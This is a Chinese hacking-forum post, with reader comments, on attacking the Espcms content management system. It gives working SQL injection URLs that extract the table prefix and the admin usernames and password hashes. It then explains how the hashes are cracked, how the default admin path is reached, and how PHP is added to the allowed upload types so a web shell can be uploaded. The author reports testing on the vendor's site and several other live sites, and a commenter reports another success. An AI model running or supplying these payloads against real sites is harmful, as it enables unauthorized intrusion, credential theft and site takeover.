易思企业系统Espcms注入漏洞+后台拿shell

2013-03-11 08:27:53 7 4820
作者:阿峰

博客:www.afeng.org

今天下午看到seay发表一篇文章,【Espcms 通杀 SQL注入漏洞分析附EXP+拿下官网】
下载了他的exp,找了几个网站,都没有爆出来,成功率很低...,如图

我就找他调侃了一会,
刚开始他说也不知道是怎么回事,后来听他说知道了…不知道他是否更新了…

关于漏洞文件和细节我就不说了,根据他的注入语句我重新修改了一下。

爆前缀:

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by afeng

有图有真相,先来测试一下espcms的官网吧,如图:

看到了吧,前缀是espcms…然后继续爆用户名和密码,无果。就去问了一下seay,他说官网已经修复了,好吧。
我们再来看看其他网站是如何的呢?

爆用户名和密码:

/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

比如官方的前缀是espcms,那么在爆用户名和密码的时候,语句中的前缀二字要修改为espcms。
测试了三个站,成功率还是蛮高的,如图:

————————-分割线———————————————


————————-分割线———————————————

————————-分割线———————————————
我高高兴兴的拿去破解md5,次噢,提示您输入的密文格式不对,我仔细数了数33位,
第一次见,给泼了一盆凉水…我对比了一下这三个MD5,我惊喜发现最后一位都是数字1,
果断删去最后1位,再解,提示收费,好吧,果断购买。

网站的账号和密码,咱都有了,该进行下一步了…

易思ESPCMS默认后台地址:/adminsoft/index.php

后台拿shell很简单,系统设置–图片功能设置–修改上传类型,添加php。



直接上传网马或者一句话,都可以…

提权就不说了…

关于作者

afeng5篇文章382篇回复

此人比较懒。

评论7次

要评论?请先  登录  或  注册
  • 7楼
    2013-4-9 19:27

    膜拜楼主了,真心跪了,学得真不错 PHP

  • 6楼
    2013-3-13 09:40

    懂php,而且还学的这么好,说真的,挺羡慕你们的~~~~

  • 5楼
    2013-3-12 13:20

    都在搞这个?

  • 4楼
    2013-3-11 12:13

    昨天测试了一个瓷器的成功了

  • 3楼
    2013-3-11 11:08

    为啥撸主要在第二张官方网站的图片上打马赛克

  • 2楼
    2013-3-11 10:32

    。。。哥,你这个是老版本的才能这么爆,在Seay的文章已经说了,新版本“但是由于espcms默认配置是不显示SQL语句错误的,而第一条SQL语句查询出来的是count(*),即int, 更蛋疼的是只要第一条查询报错,第二条就不会执行。所以只有用第一条盲注来搞了。 exp爆出是N个0的是由于老版本没有过滤函数“

  • 1楼
    2013-3-11 09:16

    这个 md5 的方式 真让人蛋疼 见过 删位的 见过插位的 就是没有见过 加位的还是 一个 固定的字符 我的神啊 这尼玛